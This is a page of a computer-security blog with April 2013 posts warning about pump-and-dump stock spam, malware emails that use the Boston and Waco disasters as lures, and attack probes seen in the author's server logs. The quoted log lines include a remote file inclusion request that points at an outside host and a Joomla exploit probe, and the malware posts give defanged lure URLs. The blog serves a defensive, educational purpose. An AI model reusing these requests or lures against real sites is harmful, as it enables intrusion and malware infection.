Wiz's Computer and Website Security Blog

April 28, 2013

One week ago I wrote about a penny stock email scam, pumping up the stock value of a little known company called Scout Explorations; a.k.a. SCXN. I predicted that this pump and dump scam would have the same outcome as almost all such schemes, and it did. All of the gains seen have been wiped out and the value has dropped to where it was last Monday, at the open of trading.

Last Monday, when the scam was very fresh, a lot of people bought shares, driving the value up to 41 cents. This number held for about two days, then began to drop as the early investors cashed out, again as I predicted they would do. At the close of trading on April 26, this pink penny stock was selling for just 28 cents, after dropping all the way to 25 cents. People who bought into the scam on Monday morning made their money back if they sold on Friday. All the rest lost money, except for one group.

The one group who undoubtedly gained money were the ones who bought thousands of shares of SCXN stock while it was at 5 to 15 cents, which it was for many months. The value only began to go up as a result of an offshore email spam run, coming from computers in Belarus. These folks would have earned themselves about 25 to 35 cents a share profit, as they sold (dumped) all of their stock on Tuesday, April 23. You can follow the hourly, daily, weekly, monthly or yearly activity of this penny stock on this Fox Business News page.

What amazed me the most, while following this pump and dump scam, was that the only news about the company Scout Explorations (SCXN) was contained not in actual corporate news releases, but in spam email from Belarus. I searched their website but found nothing recent to account for a sudden run on their penny stock. What I did learn is that they are hurting financially and need to come up with a huge amount of money by June. Otherwise, their honey deal with an oil spill cleanup technology company will fall through.

My guess is that part of the reason for the spam run for SCXN was to try to raise money for the company. But, there were a lot of shares in the hands of penny stock traders and they may be the only ones to capitalize on the pump and dump of April 2013.

Normally, a pump and dump lasts no more than one week. But, this one is being continued by the scammers running the email campaign. All of this weekend, my anti-spam program, MailWasher Pro, has been deleting pompous messages from Belarus touting this stock. The language used has deteriorated over the last few days. Gone is the professionally written copy that generated the early interest which pumped the value up to 41 cents on Monday and 40 cents on Tuesday. Now, the messages are strangely worded, with very poor grammar, like one would expect from people who do not speak English as their primary language.

This suggests that the ball has been passed from the initial company that was hired to begin the pump and dump, to lesser affiliates in the former Soviet Union. You vant it proof? Here is it, your proof!

Subject: New Play Coming TONIGHT!

Why Pemex could approve in SC_X_N? Exxon captures $12 Billion following
Arkansas Oil Spill. Green would execute SC_X_N technology. Lawmakers to
remove the todays restrictions vs great Oil. As traders we shall profit as
Big Oil, while reducing tomorrows mishaps. Participate massive Oil kept
obligated by participating SC_X_N on Monday Apr 29, 2013!!!

Want to read more garbage? Look at this crap!

Subject: Book Your PROFITS now!

Why Esso must buy in S CXN? Exon nets $13 Billion due Arkansas Oil Spill.
Green Peace would implement S CXN tool. Government to remove the existing
limits against large Oil. As buyers we could benefit from Large Oil,
alongside decrease future catastrophe. Assist great Oil kept accountable
by acquiring S CXN on Apr, 29th!!!

If When you receive one or more of these email scams for SCXN, search their website, or a real business news website for any evidence of an actual press release from the company, or their representatives. The scammers running the pump and dump are creating fictitious news releases about this company in an effort to make more profit at your expense. Nothing they are writing in the email blasts is true. The dollar numbers keep changing, as related to the costs of cleaning up oil spills. The company names they drop are being changed faster than a baby goes through diapers. I looked on the Green Peace website for anything related to them considering using the SCXN "tool" and found absolutely NOTHING!

If the company does actually manage to legally acquire the oil spill cleanup system they are going for, you will read and hear about it in major business news reports, on legitimate news stations and web sites, not from spam email blasts from Belarus, or other places in the former SU.

It's none of my business if you wish to play the penny stock OTC markets. I am only trying to steer you away from an obvious scam that was designed with the purpose of pumping up the value of SCXN, only to dump the shares to the detriment of the recent investors. I am writing these articles because I am receiving dozens of spam email messages about SCXN myself and this is my way of fighting back against spammers and scammers.

Posted by Wiz at 2:53 PM | Permalink

back to top ^

April 21, 2013

Since Friday, April 19, 2013, I have received over two dozen email spam messages touting a penny stock with the initials SCXN. The purpose of these emails is to pump up interest in this stock and get as many new investors as possible to buy into it on Monday, before it crashes.

Once a predetermined price has been reached, the people already holding the majority of the shares, who also created this scheme, will cash out (dump), leaving all of the other later investors holding stock worth much less than they paid for it.

In order to try to fool spam filters, the authors add an underscore between varying letters in the symbol of the stock being spammed. So, instead of seeing the full abbreviation: SCXN, you would see S_CXN, or SC_XN, or SCX_N. No legitimate email message from a real adviser would need to try to trick spam filters in this manner.

Pump and Dump scams have been around for many years and used to be sent out by newspaper and direct mail advertisements. But, with the popularity of the Internet and availability of cheap spam email services, based in Belarus, Kazakhstan, The Ukraine, Russia, Bulgaria and Latvia (to name but a few), these schemes can be sent to tens of millions of potential dupes for a several hundred dollars.

If you have multiple email accounts and they are already on spam databases, you will receive similar spam messages in each account. Or, if you have just one email account, you will certainly see multiple versions of the current pump and dump promotion on the same weekend. The spammers send multiple messages to the same or related accounts in order to drum up as much illicit profit as possible, in the shortest time. This is because the spam runs usually happen on the weekend, while the stock exchanges are closed. When trading opens on Monday morning, the people who got tricked into investing into the stock scam of the weekend will pour money into penny stocks.

Volume is as important as price to the scammers running these schemes. High volumes of activity on Mondays can give false confidence to some holdouts and cause them to join the feeding frenzy. Once the original stock holders see the price rise to the agreed upon mark, they all cash out at the same time. This causes the value of the remaining stock to drop quickly. By the time trading has halted, these stocks are often trading at a few cents above the starting price that existed at the open of the trading day.

A few days later, the prices drop to lower levels as the last of the duped investors try to sell their almost worthless stocks at the current low price, or simply abandon them. These folks are the big losers, like everybody else who gets taken in by a Ponzi Scheme.

Here are some references I have found that you should read before you invest in any stock being promoted through any media, that has a value below $1.00.

• Pump and dump, on the Wikipedia


• Pump And Dump Definition


• Anatomy of a Pump and Dump


• Beware Of Analysts Assisting Pump And Dump Schemes


• Expose of the current Pump and Dump scam involving Pink: SCXN


• Chart showing how the SCXN stock price was flat-lined at 0.15 until this weekend's email pump and dump spam campaign began.

Things any potential investor should do (due diligence) include:

1. Fully research the company and its top executives. Do they have civil or criminal convictions on record?


2. Look for signs of previous pump and dump campaigns that suddenly inflated the price of the stock before it flat-lined again.


3. Look for real (not spammed) news releases to justify sudden inflated trading prices.


4. Study the articles I listed above to help you to identify a scam, by the words, or phrases used in the messages.


5. Learn to read the headers in email messages, so you can trace the location of the sender of any email message. Why would an American stock adviser be sending you email from a personal computer located in Belarus?


6. Finally, if you are contemplating getting knowingly involved in a pump and dump stock scheme, read this article to see what one outcome may be for the people who perpetrated the FrogAds pump and dump stock campaigns. Note the 2nd to last paragraph, which reads: "If the lower-ranking accused scammers are found guilty, they'll face 100-year sentences. But if the ringmasters are found guilty, they could get life."

You are ultimately responsible for your own security and the security of your money and investments. Don't let greed or sudden excitement cause you to lose focus.

Posted by Wiz at 5:09 PM | Permalink

back to top ^

April 18, 2013

In the early hours of April 17, 2013, I published an article detailing an email scam using the Boston bombings as the lure to attack computers with malware. Today, that scam has switched to referring to the fertilizer plant explosion in Waco West, Texas, in the evening of April 17. The links and landing pages are the same as yesterday's.

In today's email attacks, the Subjects have been changed to refer to the Waco explosion in this fashion:

Waco Explosion HD

CAUGHT ON CAMERA: Fertilizer Plant Explosion Near Waco, Texas

Raw: Texas Explosion Injures Dozens

Runner captures. Marathon Explosion

The message bodies still only contain a numeric hyperlink, in plain text. The format of these links is as follows (deactivated for your safety):

h**p://95.87.6.156/news.html

All of today's links have 4 part numeric IP addresses, followed by "/news.html" as of this writing. But, that file name has been changed to "/texas.html" in some recent messages.

As in yesterdays malware attack pages, these numeric IP links all land on a compromised computer or device in the former Soviet Union. They all contain several large iframes containing YouTube videos of the fire and sudden explosion at the fertilizer plant in Waco, Texas. And, as in the previous attacks, there is an iframe on the bottom of those pages that displays an error message, such as: "Error, please try again later."

What you wouldn't see in the last iframe is the Java Applet being called from another compromised computer. It's code embeds a hostile .jar file, a file type used specifically by Java Applets. Those .jar files are containers, much like zip files, which are expanded by Java. They then run the routines inside their configuration file to probe your web browser and operating system for the presence of Java. If you have Java installed and it is not the absolute latest patched version (against the attack code routines in the .jar file), your computer or device may be taken over by this malware downloader.

What you should know

Almost all of the current malicious exploit kits, like the Blackhole, target Java before anything else. That is because Java is installed on billion of devices World wide, often unbeknownst to the owners of those devices. Sometimes, Java gets installed when one visits a web page that uses Java Applets for interactive games and presentations. It is also installed with OpenOffice, from Apache and is needed to control the database and some other functions. Often, by the time OpenOffice is updated with a new version of Java, exploits for its existing version have been in the wild for months.

If you need Apache's OpenOffice, but don't visit web pages requiring Java, you should disable Java content in your browsers. The latest versions of Java, available since early 2013 have a security tab in the settings box, which one can uncheck (and apply) to disable Java in all browsers installed on that computer. This eliminates the browser as an attack weak link.

If you must have Java in a browser to interact with certain important web sites, or software applications that run in a browser, I recommend using a different browser for just those sites or apps and not browsing to any place else with that browser. It should not be your system default browser. That way it won't automatically open when you click on a link in say a .pdf file someone sends to you, or from a poisoned link in an email scam.

After setting up one browser to use a Java Plug-in, you need to manually disable Java in any remaining browsers. This is usually managed via your browser's Options, under such items as "Add-ons," or "Extensions," or "Plug-ins." Absolutely do this to your "default " browser.

Java is a powerful technology that can be used for good things, but nowadays it is more often exploited by bad guys than used on legitimate web sites. So, unless you know that you must have Java installed and take precautions to minimize your exposure to Java exploit kit attacks, I recommend uninstalling all instances of it. Windows users can easily find and uninstall Java through the Windows Control Panel. For Windows XP users, look for the icon labeled "Add/Remove Programs." For Windows Vista, 7 and 8, click on Programs (and Features), then "Uninstall a program." Scroll down alphabetically until you see Java anything and begin uninstalling them until there are no more instances. When the last and most recent version is gone, so will be its Control Panel icon. Now reboot your computer to flush out any Java instances that may have been active in a browser or in memory.

Finally, as I have said before, Learn to operate your computer with less than Administrator privileges! A Limited, or Standard User account on Windows is harder to take over by an exploit attack kit than one running with Admin rights. You have to jump through a couple of hoops to install programs that affect the operating system directories, or Program Files. Administrators can be infected without notice by cleverly coded malware routines. I have published three articles or web pages explaining how to operate with reduced user privileges and how this protects your computers: [1] [2] [3]

Posted by Wiz at 10:46 AM | Permalink

back to top ^

April 17, 2013

Tonight, I discovered a new malware attack tactic in the MailWasher Pro Recycle Bin. It was automatically deleted because it matched the conditions I created in a filter I call Exploit Link. In this case, the filter was matched by a numeric IP in the URL, instead of a domain name. Numeric URLs, especially those ending with a .htm or .html file are hostile 99.999999999% of the time. This one sure was.

The email arrived very late, at about 1 AM, Eastern time. Its sender was nobody I know, but it contained this enticing subject:

Explosion at the Boston Marathon

The total content in the message body was only a link, in this (deactivated) form:

h**p://178.137.100.12/news.html     (Don't go there!)

UPDATE; April 17, 2013, at 2:55 PM EDT:

I have now discovered some new numeric links containing the file name "/boston.html" - leading to exploit pages.

This is what is known as a numeric URL or hyperlink. It does not point to any known or registered domain name, just to an IP address. Spammers have set up a malicious web page on some compromised computer or hand held smart device that has been assigned a static IP address (usually by their broadband Internet service provider). In this case, the IP 178.137.100.12 is assigned to a "Kyivstar" GSM mobile broadband customer in Kiev, Ukraine. That IP address is already listed on my Russian Blocklist, under the CIDR 178.137.0.0/16.

UPDATE:
All of the links I have found in these email scams are leading to computers or devices located in Russia, Bulgaria, Latvia, or The Ukraine. This is an attack hosted by criminals based in the Former Soviet Union.

What awaits you at this numeric URL, ending in the file named: news.html?

The destination web page, news.html, contained four multiple iframes, three all but one of which have embedded YouTube videos of the Boston bombing scene. However, the 4th last iframe contains a link to a hostile Java Applet, located on a compromised web site. This Java Applet will attempt to jump out of the Java"Sandbox" and infect your operating system. This can only happen if you have Java installed and if it is a vulnerable version that they have specifically targeted for its vulnerabilities.

NOTE: Java was just updated on April 16, 2013. This was to fix 42 exploitable vulnerabilities! Go to www.java.com to see if you have Java installed and if so, what version. Then update to the newest version and make sure all older versions are uninstalled. Better yet and safer, uninstall all instances of Java from your computer and eliminate the number one attack vector used in all the major malware exploit kits.

But wait, there's more! What if you don't have Java installed, or it is unplugged from your browser, or if you operate with reduced user privileges?

In addition to the hostile iframe at the bottom of the page, there is also an HTML Meta Refresh after 60 seconds to begin downloading a malicious executable file, named: "boston.avi_______.exe." Those 7 connected underscores are there to move the .exe extension out of your line of focus, to make you think it is a harmless .avi movie. This all happens automatically. That downloaded file then attempts to install a backdoor into your computer and download other Trojans to it. It may cause a User Account Control box to appear, asking for permission to run that program. Some people may think it is just part of the video displays about the Boston tragedy and be tricked into allowing the installation to continue; by typing in their Administrator password, or just giving it an Okay. Do that and your machine becomes infected by the Trojan inside that fake .avi movie file that is really a .exe (executable program) file.

UPDATE:
The latest incarnation of the Boston Bombing Exploits (BBE), on 4/17/2013, in the mid-afternoon, does not contain the 60 second timeout for a forced Trojan download. All of the exploiting comes via the included Java Applet and its .jar file. However, some of the exploit pages still contain the Meta Refresh timed download.

I wrote this to warn others about this new and present danger to your online security. Please stay alert to the tricks used by cyber criminals who want to steal your data, identity, bank accounts, extort money from you, or use your computer as part of a spam and/or attack botnet. Emails of this nature are very dangerous. If you must watch news articles about disasters and terrorist attacks, go to CNN, or Fox, or ABC, or CBC, or the BBC, or your preferred online authentic news web site and watch them there. All legitimate news web sites have video feed sections for breaking news.

God Bless the victims of the Boston Terror attack of April 15, 2013 and their families. God Damn the cyber criminals who exploit terrible events like this for their own unlawful benefit and our loss.

Posted by Wiz at 1:21 AM | Permalink

back to top ^

April 7, 2013

Every day I read my website's raw access logs, looking for things most people ignore. Of course I want to know which search engines are sending me traffic to various pages I wrote and which pages are doing the best. But, more importantly to me, I want to know who is trying to hack my website.

When I talk to others about their websites, most of them are totally absorbed in getting the most visitors (and sales or exposure), meaning they are interested in SEO. That is a good thing, if done properly, not using spammy or blackhat tactics. They also ask about my opinions on this or that easy-to-install script that is offered by their web host. These scripts include blogs, shopping carts, CMS programs, image galleries, forums and the like. All of these add-on web software programs increase the user interactions between your website and its visitors. But, they also make your website more vulnerable to hackers.

As I read my access logs I see numerous attacks targeting various commonly installed website programs and scripts. Every single day there are dozens of probes for a WordPress login screen or admin panel. Image uploaders and themes are targeted constantly. Certain popular shopping carts are frequent targets. Plus, there seems to be a non-stop attempt by spammers to post spam comments and trackbacks on any form that will accepts user input.

One thing that most of the various and sundry attacks and probes have in common is where they come from (in IP space). Server hack attempts come mostly from Chinese IP addresses. WordPress login attempts and blog spam POSTS come mostly from Russian and Ukrainian IP addresses. Some spammers use a compromised computer or server in a different country as a relay.

Here are some recent raw access log entries exposing a source in the former Soviet Union (also Turkey):

46.119.119.60 (Ukraine) - - [07/Apr/2013:09:25:55 -0600]
"GET /blogs/(50 + signs)Result:+%F4%EE%F0%F3%EC+%ED%E5+%ED%E0%E9%E4%E5%ED+/
+%ED%E5+%F3%E4%E0%EB%EE%F1%FC+%EE%EF%F0%E5%E4%E5%EB%E8%F2%FC+IP HTTP/1.0"

37.57.25.225 (Ukraine) - - [07/Apr/2013:10:14:23 -0600] "GET /wp-login.php HTTP/1.0"

78.162.18.73 (Turkey) - - [07/Apr/2013:11:16:04 -0600]
"GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403

193.239.74.126 (Ukraine) - - [07/Apr/2013:11:51:50 -0600] "GET /wp-login.php HTTP/1.1" 404 (11 consecutive attempts!)

94.125.177.120 (Hungary) - - [31/Mar/2013:23:53:47 -0600]
"GET /blogs/technical_articles/modules/coppermine/themes/coppercop/theme.php?THEME DIR=
http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4? HTTP/1.1" 403 333 "-" "pbwww-perl/6.02"

78.184.243.200 (Turkey) - - [31/Mar/2013:22:43:50 -0600]
"POST /wp-login.php HTTP/1.1" 403 376 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0E)"

79.114.49.86 (Romania) - - [31/Mar/2013:22:14:31 -0600]
"GET /member/signup HTTP/1.1" 404

78.190.63.230 (Turkey) - - [31/Mar/2013:08:21:12 -0600]
"POST /wp-login.php HTTP/1.1" 403

(this one was relayed via a botted AT&T account) /blogs/2007/05/(42 + signs)Result:+chosen+nickname+%22bapatickmjuniora9658%22;+ReCaptcha+decoded;+%28JS%29;+
TryAntiSFS=3;+forum+connected+to+antispam-service+%28probably,+your+IP+and/or+nickname+was+BANNED+in+this+service%29;
+PM_LOGIN+mode;+no+post+sending+forms+are+found;

193.239.74.126 (Ukraine) - - [07/Apr/2013:11:51:52 -0600]
"GET /wp-login.php HTTP/1.1"

In addition to what I have listed above, there were untold log entries coming from Russian IP addresses, often with Russian user agent strings, performing what is known as referrer log spamming. This is where a website is listed in the "HTTP_REFERER) section of the access log. The Russian referred spam usually promotes dating and pornographic websites and I chose to not paste them into this article. Watch your access logs for website links leading to websites ending with .ru, .ua, .com.ua, .in, or .su, in the referer section, sometimes followed by a user agent that includes "MRA" or "ru" in the string.

Most of these IP addresses are already encompassed by my regularly updated Russian Blocklist, which is available online in two formats: .htaccess (for shared hosting accounts on Apache/Linux servers) and iptables (for dedicated and VPS Apache/Linux server hosting where you have root access). I do not currently publish a version that is compatible with Microsoft IIS servers, but I am pondering a possible conversion. Anybody whose website is hosted on an Apache based web server should be allowed to use the .htaccess directives in the Russian Blocklist, by copying and pasting them into your existing .htaccess file, or by creating a new one from the blocklist example (read instructions in file).

If you deploy any website software that runs on PHP, expect vulnerabilities to be sought and found by hackers.Subscribe to any email lists for notices of updates from each maintainer of the web software that you or your predecessors have installed into your websites. Patching vulnerable web software quickly is vital if one is to keep their website from serving malicious scripts and hidden iframes that will lead to your visitors computers getting infected with malware, ransomware, or search hijackers.

Additionally, since many of the probes I log are looking to login to a WordPress installation, please change the default password to something unguessable! Further, change the name of any folders that are named "admin" by a default installation. Hackers send bots searching for such folders, then login with the default user name and password, then add malicious scripts to your web pages.

Posted by Wiz at 2:25 PM | Permalink

back to top ^